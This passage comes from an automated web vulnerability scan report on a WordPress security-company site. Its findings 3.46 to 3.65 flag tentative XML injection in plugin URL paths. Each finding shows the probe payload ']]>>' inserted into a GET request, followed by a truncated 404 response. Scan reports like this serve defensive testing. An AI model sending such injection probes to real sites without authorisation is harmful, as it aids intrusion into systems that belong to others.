HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:40:42 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:42:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27848 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.46. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/tooltips.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/superslider Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:56:38 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:56:48 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.47. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/tooltips.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/superslider/plugin-data Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:14:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:14:59 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.48. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/tooltips.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:28:48 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:28:59 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.49. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/tooltips.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:56:06 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:57:13 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.50. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/tooltips.css [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:15:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:15:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.51. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/tooltips.css [REST URL parameter 6] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:34:18 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:34:53 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27850 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.52. http://www.ligattsecurity.com/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/wp-download Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:16:42 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:16:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.53. http://www.ligattsecurity.com/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/wp-downloadmanager Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:37:16 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:37:36 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.54. http://www.ligattsecurity.com/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:57:19 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:57:26 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.55. http://www.ligattsecurity.com/wp-content/plugins/wp-downloadmanager/download-css.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:16:47 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:17:07 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.56. http://www.ligattsecurity.com/wp-content/plugins/wp-mailinglist/css/wp-mailinglist.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/wp-mailinglist Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:52:32 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:53:53 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27827 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.57. http://www.ligattsecurity.com/wp-content/plugins/wp-mailinglist/css/wp-mailinglist.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/wp-mailinglist/css/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:23:41 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:24:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27827 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.58. http://www.ligattsecurity.com/wp-content/plugins/wp-mailinglist/css/wp-mailinglist.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:48:26 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:48:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27827 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.59. http://www.ligattsecurity.com/wp-content/plugins/wp-mailinglist/css/wp-mailinglist.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:16:27 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:16:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27827 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.60. http://www.ligattsecurity.com/wp-content/plugins/wp-mailinglist/js/wp-mailinglist.js [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/wp-mailinglist Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:48:03 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:48:21 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.61. http://www.ligattsecurity.com/wp-content/plugins/wp-mailinglist/js/wp-mailinglist.js [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/wp-mailinglist/js/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:05:10 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:05:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.62. http://www.ligattsecurity.com/wp-content/plugins/wp-mailinglist/js/wp-mailinglist.js [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:23:28 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:23:56 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.63. http://www.ligattsecurity.com/wp-content/plugins/wp-mailinglist/js/wp-mailinglist.js [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:45:58 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:46:20 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.64. http://www.ligattsecurity.com/wp-content/plugins/wp-mailinglist/js/wp-mailinglist.js [REST URL parameter 5] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:08:50 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:08:57 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.65. http://www.ligattsecurity.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/wp-polls/polls Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
